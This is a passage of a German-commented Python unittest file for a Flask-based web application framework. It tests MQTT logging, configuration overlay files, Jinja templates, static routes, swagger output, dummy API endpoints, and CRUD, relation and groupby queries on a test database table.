"payload": {"text":"payload als dict"}
})
self.assertEqual(
result["payload"], {"text":"payload als dict"}, "Fehler bei dict payload")
# mqtt.client.subscribe( "gqa_dev/logging/#" )
# mqtt funktionen über logger
logger = logging.getLogger( "MQTT" )
logger.setLevel( logging.DEBUG )
logger.send()
logger.send("test/publish")
logger.progressStart( "test" )
logger.progress( "test", 50 )
logger.progressReady( "test" )
# test über mqtt anstatt über sofort über logger
mqtt.logging = True
mqtt.info("config.info")
mqtt.warning("config.warning")
mqtt.error("config.error")
# .. todo:: config ohne mqtt Ausgabe auf der Konsole
config.mqttCleanup()
mqtt.info("config.info nach cleanup")
mqtt.warning("config.warning nach cleanup")
mqtt.error("config.error nach cleanup")
# config mit falschen mqtt Angaben
#
config = ispConfig( )
port = config._config.server.mqtt.port
config._config.server.mqtt.port = 111111
config.mqttInitLogger( cleanup=True )
mqtt = config.mqttGetHandler()
self.assertIsNone(
mqtt, "Trotz init Fehler MQTT handler vorhanden")
#mqtt.info("config.info nach Fehler bei MQTT config")
config._config.server.mqtt.port = port
config.mqttInitLogger( cleanup=True )
time.sleep(4) # Sleep for 2 seconds um mqtt zu empfangen
# hier gibt es keine Ausgaben, da mqtt nicht mehr da ist
logger.info("logger.info nach MQTT init Fehler")
logger.send("cmnd/test/publish", "nach MQTT init Fehler")
time.sleep(2) # Sleep for 2 seconds um logger mqtt zu empfangen
#print( results )
self.assertIn(
"cmnd/test/publish", results, "Fehler nach MQTT init Fehler")
#mqtt.publish({
# "topic": "cmnd/status"
#})
# mqtt in config schließen
config.mqttCleanup( )
#print( results )
def test_config_files( self ):
# einfach config bereitstellen
config = ispConfig( )
temp_conf = {
"unittest": True,
"version" : "0.0.1",
"variables": {
"Version" : "0.0.1a",
},
"value": 0,
"content": "test"
}
config = ispConfig( config = temp_conf )
test = {
"value" : config.get("value"),
"content" : config.get("content"),
"info" : config.get("info")
}
self.assertDictEqual(test, {
"value" : 0,
"content" : "test",
"info" : None
}, "config Rückgabe stimmt nicht")
# Versions Angabe prüfen
# zusätzliche Dateien anlegen
unitest_json_file_00 = os.path.join( config.BASE_DIR, "config", "config-18200000.json")
with open(unitest_json_file_00, 'w') as f:
f.write( '{ "value": 0, "content": "test" }' )
unitest_json_file_01 = os.path.join( config.BASE_DIR, "config", "config-18200101.json")
with open(unitest_json_file_01, 'w') as f:
f.write( '{ "value": 1, "info": "info 18200101" }' )
unitest_json_file_05 = os.path.join( config.BASE_DIR, "config", "config-18200105.json")
with open(unitest_json_file_05, 'w') as f:
f.write( '{ "value": 5, "info": "info 18200105" }' )
config = ispConfig( )
test = {
"value" : config.get("value"),
"content" : config.get("content"),
"info" : config.get("info")
}
self.assertDictEqual(test, {
"value" : 5,
"content" : "test",
"info" : "info 18200105"
}, "config Rückgabe stimmt nicht")
config = ispConfig( lastOverlay="18200101" )
test = {
"value" : config.get("value"),
"content" : config.get("content"),
"info" : config.get("info")
}
self.assertDictEqual(test, {
"value" : 1,
"content" : "test",
"info" : "info 18200101"
}, "config Rückgabe stimmt nicht")
os.remove( unitest_json_file_00 )
os.remove( unitest_json_file_01 )
os.remove( unitest_json_file_05 )
# config-0000.json mit falschen Inhalt erzeugen,
# Fehler prüfen und Datei wieder löschen
#
error_json_file = os.path.join( config.BASE_DIR, "config", "config-0000.json")
with open(error_json_file, 'w') as f:
f.write( "#Falscher Inhalt" )
config = ispConfig()
self.assertEqual(
config._loadErrors, [ error_json_file ], "load error wurde nicht ausgelöst")
os.remove( error_json_file )
def test_config_jinja(self):
'''jinja Template Funktionen der config testen.
'''
# eine eigene config mit resources im tests Ordner
config = ispConfig( config={
"server": {
"webserver": {
"resources" : os.path.join( ABSPATH, "resources" )
}
}
})
# das aktuelle datum
datum = datetime.now().strftime('%d.%m.%Y')
result_A = """<ul>
<li>testuser</li>
</ul>
<ul>
<li>Datum aus Parameter <strong>datum</strong> :{{datum}}</li>
<li>Inhalt aus Parameter: {{user}}</li>
</ul>
Datum mit now: #datum#""".replace( "#datum#", datum )
result_B = """<ul>
<li>testuser</li>
</ul>
<ul>
<li>Datum aus Parameter <strong>datum</strong> :#datum#</li>
<li>Inhalt aus Parameter: testuser</li>
</ul>
Datum mit now: #datum#""".replace( "#datum#", datum )
meta = {
"user" : "testuser",
"datum": "{{ now.strftime('%d.%m.%Y') }}",
"name": "{{user}}"
}
tpl = """{% markdown %}
* {{ user }}
{% endmarkdown %}
{% include "test_template.tmpl" %}
Datum mit now: {{ now.strftime('%d.%m.%Y') }}"""
result = config.render_template( tpl, meta, deep_replace=False )
self.assertEqual(result, result_A, "template nicht OK")
result = config.render_template( tpl, meta, deep_replace=True )
self.assertEqual(result, result_B, "template nicht OK")
def test_webapp_base_system( self ):
''' Webapp Aufruf auf system funktionen
'''
response = self.app.get( "api/system" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
response = self.app.get( "api/system", query_string = { "format" : "html" } )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
response = self.app.get( "api/system/test", query_string = { "zahl" : 12 } )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertDictEqual(
response.json["data"],
{ "_ispcp": {}, "bool": False, "text": "typenlos", "zahl": 12.0},
"Response data nicht OK"
)
response = self.app.get( "api/system/15" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertDictEqual(
response.json["data"]["kwargs"],
{'format': 'html', 'info': 'kwargs', 'systemId': '15'},
"Response data nicht OK"
)
# print("test_webapp_base_system", response.json )
def test_webapp_base_statics( self ):
''' Webapp Aufruf auf Statische Inhalte
'''
# index auf zwei arten aufrufen
response = self.app.get( "/" )
#self.assertEqual(response.status_code, 200, "Api Status nicht 200")
index = response.data
response = self.app.get( "/render/index", query_string = {
"zahl":"012",
"bool":True,
"test":1,
"_ispcp": json.dumps( {"name":"B"} )
} )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(index, response.data, "index und render/index nicht gleich")
# render auf nicht auf nicht vorhandenes Template in ui
response = self.app.get( "/render/keintemplate" )
self.assertEqual(response.status_code, 404, "render auf nicht auf nicht vorhandenes Template in ui")
# load auf nicht vorhandene Datei testen
response = self.app.get( "/globals/js/keinedatei" )
self.assertEqual(response.status_code, 404, "load auf nicht vorhandene Datei")
# in ui eine unittest_route.phtml erzeugen
route_file = os.path.join( ABSPATH , "..", "ui", "unittest_route.phtml")
with open(route_file, 'w') as f:
f.write( "value={{ value }}" )
# ohne parameter
response = self.app.get( "/unittest_route" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(response.data, b"value=None", "Inhalt ist nicht value=None;_ispcp=")
# zwei gleiche parameter (nur der erste wird verwendet)
response = self.app.get( "/unittest_route?value=12&value=1" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(response.data, b"value=12", "Inhalt ist nicht value=12;_ispcp= FirstValueURIParser")
# unittest_route.phtml in ui wieder entfernen
os.remove( route_file )
# in ui eine unittest_route_ispcp.phtml erzeugen
route_file1 = os.path.join( ABSPATH , "..", "ui", "unittest_route_ispcp.phtml")
with open(route_file1, 'w') as f:
f.write( "{{ params }}" )
# Parameter als dict
response = self.app.get( '/unittest_route_ispcp' , query_string = {
"name":"A",
"uuid":1,
"id":1,
"_ispcp": json.dumps( {"name":"B"} )
} )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertDictEqual( json.loads( response.data.decode('utf-8') ), {"uuid": "1", "id": "1", "name": "B"}, "Inhalt ist nicht mit dict")
# unittest_route_ispcp.phtml in ui wieder entfernen
os.remove(route_file1)
#
# mit fehler bei _ispcp
response = self.app.get( "/render/index", query_string = {
"zahl":"012",
"bool":True,
"test":1,
"_ispcp": "name"
} )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
def test_webapp_base_extras( self ):
''' Website Aufruf für zusätzliche Inhalte
'''
# htmlcov laden geht nur wenn es schon erzeugt wurde
htmlcov_path = osp.join( ABSPATH , "..", ".htmlcov")
if osp.isdir( htmlcov_path ):
response = self.app.get( "/coverage" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
response = self.app.get( "/coverage/coverage.css" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
else:
print( "(coverage) Test erst nach dem Erstellen möglich." )
# über resources laden
response = self.app.get( "resources/logo.png" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# über fonts laden aber mit Fehler für coverage
response = self.app.get( "fonts/irgendwas" )
self.assertEqual(response.status_code, 404, "Api Status nicht 404")
# über dbadminframe laden
response = self.app.get( "dbadminframe" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# docs iframe laden
response = self.app.get( "/docs" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# /docs/ wird zu /docs also auch iframe laden
response = self.app.get( "/docs/" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# docs laden (beim ersten Aufruf erzeugen)
response = self.app.get( "/docs/index.html" )
# es kommt vor das erst beim 2. Aufruf alles erzeugt wird
if response.status_code == 404:
# 2. Versuch
response = self.app.get( "/docs/index.html" )
# jetzt OK
self.assertEqual(response.status_code, 200, "docs Aufruf Api Status nicht 200. Wurde docs erzeugt?")
# dbadmin laden
response = self.app.get( "/dbadmin" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# neue webapp ohne parameter
webbapp =ispBaseWebApp( )
self.assertEqual(webbapp._config.get("server.webserver.TESTING"), True, "Testing ist nicht True")
# neue webapp mit dict nur mit TESTING Angabe
webbapp =ispBaseWebApp( {"server" : {"webserver" : { "TESTING": True } } } )
self.assertEqual(webbapp._config.get("server.webserver.TESTING"), True, "Testing ist nicht True")
def test_webapp_base_api( self ):
# Inhalt von swagger mit der Angabe in custom_swagger_path prüfen
response = self.app.get( "api/swagger.json" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["info"]["title"], "swagger test", "swagger file nicht ok")
self.assertEqual(
list( response.json["paths"].keys() ),
['/dbtests/', '/dbtests/groupby', '/dbtests/test', '/dbtests/undefined', '/dbtests/{dbtestsId}/', '/dbtests/{dbtestsId}/dbtestsrel',
'/dbtestsrel/', '/dbtestsrel/groupby', '/dbtestsrel/undefined', '/dbtestsrel/{dbtestsrelId}/', '/dbtestsrel/{dbtestsrelId}/dbtests',
'/dummy/', '/dummy/pdf', '/dummy/test', '/dummy/{dummyId}/',
'/system/', '/system/test', '/system/{systemId}/'
],
"Fehlerhafte paths Angaben in swagger.json")
response = self.app.get( "api/gibtsnicht" )
self.assertEqual(response.status_code, 404, "Fehlerhafter api Zugriff ist nicht 404")
def test_webapp_dummy_test( self ):
''' Api aufruf durchführen
GET /api/dummy/
'''
# --- dummy Klasse abfragen
# dummy api_list abfragen
response = self.app.get( "api/dummy" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["data"], [{
'attributes': {'function': 'api_list', 'kwargs': {'_ispcp': {}}},
'id': '12',
'links': {'self': 'http://localhost/api/dummy/12/'},
'type': 'dummy'
}],
"falsche api_list Rückgabe"
)
# dummy api_get abfragen wird dummyId mitgegeben
response = self.app.get( "api/dummy/12" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
#print(response.json["data"][0])
self.assertDictEqual(
response.json["data"], {
'attributes': {'dummyId': '12'},
'id': 12,
'links': {'self': 'http://localhost/api/dummy/12/'},
'type': 'dummy'
},
"falsche id Rückgabe"
)
#print( response.json )
# ohne Pflichfeld Angabe test gibt es nicht
response = self.app.get( "api/dummy/test" )
# print("api/dummy/test", response.json )
self.assertEqual(response.status_code, 400, "Api Status nicht 400")
self.assertDictEqual(
response.json,
{
"message": {
"zahl": "Eine Zahl"
}
},
"nicht abgelehnt ohne Pflichfeld Angabe"
)
# ohne text (hat default) mit test (nicht vorhanden)
# /api/system/test?zahl=012&bool=True&test=1&_ispcp={"name":"B"}
response = self.app.get( "api/dummy/test", query_string={
"zahl":"012",
"bool":True,
"test":1,
"_ispcp": json.dumps( {"name":"B"} )
} )
# kommen auch zusätzliche Angaben und werden unnötige ausgefiltert
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertDictEqual(
response.json["data"],
{
"_ispcp": {"name": "B"},
"bool": True,
"text": "typenlos",
"zahl": 12.0
},
"Parameter Auswertung falsch"
)
response = self.app.get( "api/dummy/undefined" )
# einen undefined holen
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["data"],
[{'attributes': {}, 'id': 'undefined', 'type': 'dummy'}],
"undefined fehlerhaft"
)
# Dummy ohne funktion gibt undefined Datensatz
response = self.app.get( "api/dummy/gibtsnicht" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["data"],
{ 'attributes': {}, 'id': 'undefined', 'type': 'dummy' },
"Dummy ohne funktion gibt keine undefined datensatz "
)
#
response = self.app.get( "api/dummy/test", query_string={ "zahl": 1 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json["data"],
[],
"Test leere Liste"
)
response = self.app.get( "api/dummy/test", query_string={ "zahl": 2 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json["data"],
[{"a": 1, "b": 2}],
"Test Liste mit einem Element"
)
# fehler bei der Umwandlung data bleibt leer
response = self.app.get( "api/dummy/test", query_string={ "zahl": 3 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json["data"],
[],
"fehler bei der Umwandlung data bleibt leer"
)
response = self.app.get( "api/dummy/test", query_string={ "zahl": 4 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
#print( response.json )
response = self.app.get( "api/dummy/test", query_string={ "zahl": 5, "_ispcp" : "{test}"} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['App-Error'],
[{'message': 'swagger Parameter Json Error', 'info': '_ispcp={test}'}],
"Parameter Json Error"
)
# _int_query selbst aufrufen
response = self.app.get( "api/dummy/test", query_string={ "zahl": 6 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['data'],
[{'A': 1}, {'B': 2}],
"Parameter Json Error"
)
# _int_group_query selbst aufrufen
response = self.app.get( "api/dummy/test", query_string={ "zahl": 7 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['App-Error'],
[],
# [{'message': 'Fehler bei _int_group', 'info': "'dummyQuery' object has no attribute 'group_by'"}],
"_int_group_query selbst aufrufen"
)
# access_cls selbst aufrufen
response = self.app.get( "api/dummy/test", query_string={ "zahl": 8 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['data'],
[{'nicht da': ''}, {'sqlalchemy.BigInteger': ''}],
"access_cls selbst aufrufen"
)
# iso2date aufrufen
response = self.app.get( "api/dummy/test", query_string={ "zahl": 9 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['data'],
[
{'test=None': None},
{'20180415=2018-04-15': '2018-04-15'},
{'2018-04-15=2018-04-15': '2018-04-15'},
{'2018-04-15 14:36:25=2018-04-15': '2018-04-15'},
{'2018-04-15=18-04-15 00:00:00': '2018-04-15 00:00:00'},
{'2018-04-15 14:36:25=2018-04-15 14:36:25': '2018-04-15 14:36:25'},
{'20180415 14:36:25=2018-04-15 14:36:25': '2018-04-15 14:36:25'},
{'20180415 14:36=2018-04-15 14:36:00': '2018-04-15 14:36:00'},
{'201A0415 14:36:25=None': None},
{'201A0415 14:36=None': None},
{'201A0415=None': None}
],
"iso2date aufrufen"
)
# versuchen eine vorhandene Funktion ohne rpc Kennung aufzurufen
response = self.app.get( "api/dummy/norpc" )
self.assertEqual(response.status_code, 400, "Status nicht 400")
self.assertEqual(
response.json,
{},
"versuchen eine vorhandene Funktion ohne rpc Kennung aufzurufen"
)
#print( response.json )
def test_webapp_db_tests_A( self ):
''' Api aufruf durchführen
GET /tests/
'''
# zuerst den zugriff testen und prüfen ob die tabelle 5 datensätze hat
#
response = self.app.get( "api/dbtests/", query_string={})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
len(response.json["data"]), 5, "keine 5 Datensätze"
)
#
# einen Datensatz zusätzlich einfügen
#
response = self.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string":"sechs", # Pflichtfeld
#"date":"2020-08-19",
"integer":6
},
"type":"dbtests"
}
}), follow_redirects=True)
self.assertEqual(response.status_code, 201, "Api Status nicht 201 (Created)")
self.assertEqual( response.json["data"]["id"], '6', "Datensatz id ist nicht 6")
# record merken
newRecord6 = response.json["data"]["attributes"]
id6 = response.json["data"]["id"]
link6 = response.json["data"]["links"]["self"]
#
# einen zweiten einfügen
#
response = self.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string":"sieben", # Pflichtfeld
#"date":"2020-08-19",
"integer":7
},
"type":"dbtests"
}
}), follow_redirects=True)
self.assertEqual(response.status_code, 201, "Api Status nicht 201 (Created)")
self.assertEqual( response.json["data"]["id"], '7', "Datensatz id ist nicht 7")
# record merken
newRecord7 = response.json["data"]["attributes"]
id7 = response.json["data"]["id"]
link7 = response.json["data"]["links"]["self"]
#
# jetzt alle holen und prüfen
#
response = self.app.get( "api/dbtests/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( len(response.json["data"]), 7, "Datensatzanzahl ist nicht 7")
id = response.json["data"][5]["id"] # zählung ab 0 (5 ist record 6)
record = response.json["data"][5]["attributes"]
link = response.json["data"][5]["links"]["self"]
self.assertEqual( id, id6, "Datensatz id=6 vom ersten stimmt nicht")
self.assertEqual( record, newRecord6, "Datensatz Inhalt vom ersten stimmt nicht")
#
# den siebten Datensatz über den angegebenen link holen
#
response = self.app.get( link7 )
self.assertEqual( response.json["data"]["id"], '7', "Datensatz Id Rückgabe ist nicht 7")
self.assertEqual( type(response.json["data"]), dict, "Datensatz data ist kein dict")
# Inhalt vergleichen
self.assertEqual( response.json["data"]["attributes"], newRecord7, "Datensatz Inhalt stimmt nicht")
#
# siebten Datensatz ändern - die id muss in body und path angegeben werden
#
response = self.app.patch( link7, headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
# "date":"2020-08-19 00:00", # 2020-08-20, 00:00
"string":"changed",
},
"id": '7',
"type":"dbtests"
}
}), follow_redirects=True)
# 200 - Request fulfilled, document follows
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# Inhalt darf nicht mehr gleich sein
self.assertNotEqual( response.json["data"], newRecord7, "Datensatz Inhalt ist noch gleich")
#
# den zweiten Datensatz über den angegebenen link holen und Änderungen prüfen
#
response = self.app.get( link7 )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"]["attributes"]["string"], "changed", "Feldinhalt ist nicht changed")
# alle holen
response = self.app.get( "api/dbtests/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
lastCount = len(response.json["data"] )
# Datensatz 6 und 7 löschen
response = self.app.delete( link6, headers={'Content-Type': 'application/json'} )
self.assertEqual(response.status_code, 204, "Api Status nicht 204")
# alle verbleibenden holen und Anzahl prüfen
response = self.app.get( "api/dbtests/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(len(response.json["data"] ), lastCount - 1 , "Api Status nicht {}".format( lastCount - 1 ))
# jetzt noch 7 löschen
response = self.app.delete( link7, headers={'Content-Type': 'application/json'} )
self.assertEqual(response.status_code, 204, "Api Status nicht 204")
# nach dem löschen Anzahl prüfen
response = self.app.get( "api/dbtests/", query_string={})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
len(response.json["data"]), 5, "keine 5 Datensätze nach dem löschen von 6 und 7"
)
# fehler bei falschem patch
response = self.app.patch( link7, headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string_gibtsnicht":"changed",
},
"id": '99',
"type":"dbtests"
}
}), follow_redirects=True)
self.assertEqual(response.status_code, 500, "Api Status nicht 500")
self.assertEqual(
response.json["App-Error"],
[{'message': 'patch - unbekannter Fehler', 'info': '500'}],
"fehler bei falschem patch"
)
def test_webapp_db_tests_B( self ):
''' Api aufruf durchführen
GET /tests/
'''
# einen undefined holen
response = self.app.get( "api/dbtests/undefined")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["data"],
[{'attributes': {
'aktiv': None,
'data': None,
'date': None,
'decimal': None,
'float': None,
'gruppe': None,
'integer': None,
'isodate': None,
'isodatetime': None,
'numeric': None,
'string': None,
'tags': None
}, 'id': 'undefined', 'type': 'dbtests'}],
"einen undefined holen"
)
# funktion test in dbtests aufrufen - gibt 205 als code
response = self.app.get( "api/dbtests/test", query_string={
"zahl" : 12 # Pflichfeld
})
#print(response.json["data"])
self.assertEqual(response.status_code, 205, "Api Status nicht 205")
self.assertDictEqual(
response.json["data"],
{'attributes': {
'aktiv': None,
'data': None,
'date': None,
'decimal': None,
'float': None,
'gruppe': None,
'integer': None,
'isodate': None,
'isodatetime': None,
'numeric': None,
'string': None,
'tags': 'defaulttag'
}, 'id': 'undefined', 'type': 'dbtests'},
"einen undefined holen"
)
# fehler bei falscher Filterangabe
response = self.app.get( "api/dbtests/", query_string={
"zahl" : 12, # Pflichfeld
"filter" : "eq(tid=1)"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["App-Error"],
[{
'message': '_int_filter',
'info': 'RQL Syntax error: (\'eq(tid=1)\', 6, \'Expected ")"\')'
}],
"fehler bei falscher Filterangabe "
)
# wird nur für htmlcov aufgerufen
response = self.app.get( "api/dbtests/test", query_string={
"dbtestsId" : 2, # mit cls.object_id
"zahl" : 12 # Pflichfeld
})
self.assertEqual(response.status_code, 205, "Api Status nicht 205")
def test_webapp_db_tests_C( self ):
# einen nicht vorhandenen Datensatz abrufen
# FIXME: Meldung auf der Konsole unterdrücken in method_wrapper vorher abfangen ?
response = self.app.get( "api/dbtests/100")
self.assertEqual(response.status_code, 404, "Api Status nicht 404 - notFound")
def test_webapp_db_relation( self ):
''' Api aufruf für relative Tabellen
api/dbtestsrel?filter=eq(dbtests_id,2)
[{'attributes': {'dbtests_id': 2, 'rdata': None, 'rdate': None, 'rgroup': 'B', 'rinteger': 12, 'rstring': 'r_zwei'}, 'id': '2', 'links': {'self': 'http://localhost/api/dbtestsrel/2/'}, 'relationships': {'dbtests': {'data': None, 'links': {'self': 'http://localhost/api/dbtestsrel/2/dbtests'}}}, 'type': 'dbtestsrel'}]
'''
# zuerst den zugriff testen und prüfen ob die tabelle leer ist
#
response = self.app.get( "api/dbtests/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
len( response.json["data"] ), 5, "keine 5 Datensätze"
)
response = self.app.get( "api/dbtestsrel/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
len(response.json["data"]), 5, "keine 5 Datensätze"
)
# daten über path und filter müssen gleich sein nur die globale links Angabe unterscheidet sich
# http://127.0.0.1:5000/api/nutzung?_ispcp={%22_default%22:{%22ersatz_id%22:1754}}&filter=eq(ersatz_id,1754)&page[offset]=0&page[limit]=25
response = self.app.get( "api/dbtests/2/dbtestsrel")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
reldata = response.json
response = self.app.get( "api/dbtestsrel", query_string={
"filter":"eq(dbtests_id,2)"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
reldata["data"], response.json["data"],
"Rückgaben sind nicht gleich"
)
def test_webapp_db_group( self ):
''' Api aufruf für relative Tabellen
# ohne group Angabe wird fields verwendet
/api/<modul>/groupby?fields[<modul>]=<feld1>
# mit group
/api/<modul>/groupby?fields[<modul>]=<feld1,feld2>&groups=<feld1,feld2>
# mit group und delimiter
/api/<modul>/groupby?fields[<modul>]=<feld1,feld2>&groups[<modul>]=<feld1,feld2>&delimiter=,
# mit Filter
/api/<modul>/groupby?fields[<modul>]=<feld1,feld2>&filter=eq(aktiv,true)
# mit labels
/api/<modul>/groupby?fields[<modul>]=<feld1,feld2>&labels={"dbtests.gruppe": "Hallo"}
'''
# mit fields Angabe
response = self.app.get( "api/dbtests/groupby", query_string={
"fields[dbtests]":"gruppe"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],[
{'attributes': {'hasChildren': 1, 'gruppe': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'gruppe': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'gruppe': 'C'}, 'id': None, 'type': 'dbtests'}
], "groupby mit fields Angabe Rückgabe fehlerhaft " )
# mit groups Angabe
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"gruppe"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],[
{'attributes': {'hasChildren': 1, 'gruppe': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'gruppe': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'gruppe': 'C'}, 'id': None, 'type': 'dbtests'}
], "groupby mit groups Angabe Rückgabe fehlerhaft " )
# mit Filter und zwei Gruppierungs Feldern
response = self.app.get( "api/dbtests/groupby", query_string={
"groups[dbtests]":"gruppe,tags",
"filter":"eq(aktiv,true)"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],[
{'attributes': {'gruppe': 'A', 'hasChildren': 1, 'tags': 'A,K'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'gruppe': 'B', 'hasChildren': 1, 'tags': 'A,K'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'gruppe': 'C', 'hasChildren': 1, 'tags': 'M,K'}, 'id': None, 'type': 'dbtests'}
], "groupby mit Filter und zwei Gruppierungs Feldern fehlerhaft " )
# mit delimiter
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"tags",
"delimiter": ","
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],[
{'attributes': {'tags': 'A'}},
{'attributes': {'tags': 'B'}},
{'attributes': {'tags': 'K'}},
{'attributes': {'tags': 'M'}}
], "groupby mit delimiter Rückgabe fehlerhaft " )
# groupby mit label testen
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"gruppe",
"labels": '{"dbtests.gruppe": "lGruppe"}'
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],
[
{'attributes': {'hasChildren': 1, 'lGruppe': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppe': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppe': 'C'}, 'id': None, 'type': 'dbtests'}
]
, "groupby mit label fehlerhaft " )
# groupby mit zweifachen label testen
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"gruppe",
"labels": '{"dbtests.gruppe": ["lGruppeA", "lGruppeB"]}'
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],
[
{'attributes': {'hasChildren': 1, 'lGruppeA': 'A', 'lGruppeB': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppeA': 'B', 'lGruppeB': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppeA': 'C', 'lGruppeB': 'C'}, 'id': None, 'type': 'dbtests'}
]
, "groupby mit label fehlerhaft " )
# groupby mit fields und label testen
response = self.app.get( "api/dbtests/groupby", query_string={
"fields[dbtests]":"gruppe",
"labels": '{"dbtests.gruppe": "lGruppe"}'
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(response.json["data"],
[
{'attributes': {'lGruppe': 'A', 'hasChildren': 1}, 'id': None, 'type': 'dbtests'},
{'attributes': {'lGruppe': 'B', 'hasChildren': 2}, 'id': None, 'type': 'dbtests'},
{'attributes': {'lGruppe': 'C', 'hasChildren': 2}, 'id': None, 'type': 'dbtests'}
]
, "groupby mit fields und label fehlerhaft" )
# groupby mit fields und zweifachen label testen
response = self.app.get( "api/dbtests/groupby", query_string={
"fields[dbtests]":"gruppe",
"labels": '{"dbtests.gruppe": ["lGruppeA", "lGruppeB"]}'
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],
[
{'attributes': {'hasChildren': 1, 'lGruppeA': 'A', 'lGruppeB': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppeA': 'B', 'lGruppeB': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppeA': 'C', 'lGruppeB': 'C'}, 'id': None, 'type': 'dbtests'}
]
, "groupby mit fields und label fehlerhaft" )
# id als gruppe wird ausgefiltert
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"id"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"], [
{'attributes': {'hasChildren': 1}, 'id': 1, 'type': 'dbtests'},
{'attributes': {'hasChildren': 1}, 'id': 2, 'type': 'dbtests'},
{'attributes': {'hasChildren': 1}, 'id': 3, 'type': 'dbtests'},
{'attributes': {'hasChildren': 1}, 'id': 4, 'type': 'dbtests'},
{'attributes': {'hasChildren': 1}, 'id': 5, 'type': 'dbtests'}
] , "id als gruppe wird ausgefiltert" )
def test_webapp_db_typen( self ):
''' Verschiedene feldtype testen
'''
# .. todo:: numerische Felder -
# datums Felder - date
# json Felder - data
